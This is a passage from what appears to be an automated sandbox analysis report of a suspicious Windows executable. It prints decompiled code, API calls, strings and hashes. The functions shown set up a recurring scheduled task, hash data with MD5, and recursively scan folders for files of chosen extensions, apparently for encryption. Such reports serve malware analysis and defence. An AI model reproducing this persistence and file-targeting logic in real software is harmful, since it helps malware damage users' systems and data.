					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32 ref: 0040D2F0
VariantInit.OLEAUT32 ref: 0040D309
VariantInit.OLEAUT32 ref: 0040D322
VariantInit.OLEAUT32 ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

--Task, xrefs: 0040D8DD
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
Trigger1, xrefs: 0040D6FA
2030-05-02T08:00:00, xrefs: 0040D737
Time Trigger Task, xrefs: 0040D43C, 0040D973
Author Name, xrefs: 0040D4C8
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
PT5M, xrefs: 0040D5A1, 0040D66C

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: dfaaa4bf463cfa06d931472741bf0c35b6dcd6b721db6964ae10ad168839bb9f
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: dfaaa4bf463cfa06d931472741bf0c35b6dcd6b721db6964ae10ad168839bb9f
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff); // executed
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 58767ee62d541c0ac93fa7b2988ab1e5126a7052be10478fd2962cce1534a85e
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 58767ee62d541c0ac93fa7b2988ab1e5126a7052be10478fd2962cce1534a85e
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				void* _t357;
				void* _t374;
				signed int _t380;
				WCHAR* _t381;
				int _t390;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(E004CAB09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0(); // executed
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4, 0);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796); // executed
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4, 0);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48); // executed
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204, 0);
													_v156 = 0;
													E00413B70(_a28,  &_v180); // executed
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796); // executed
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4, 0); // executed
						_t374 = E0040F310(_t529, _t538); // executed
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t457,  &_v128,  &_a4, 0);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							_t390 = PathFileExistsW( >=  ? _v128 :  &_v128); // executed
							if(_t390 == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00); // executed
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128, 0);
								E0040F0E0(_t529); // executed
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
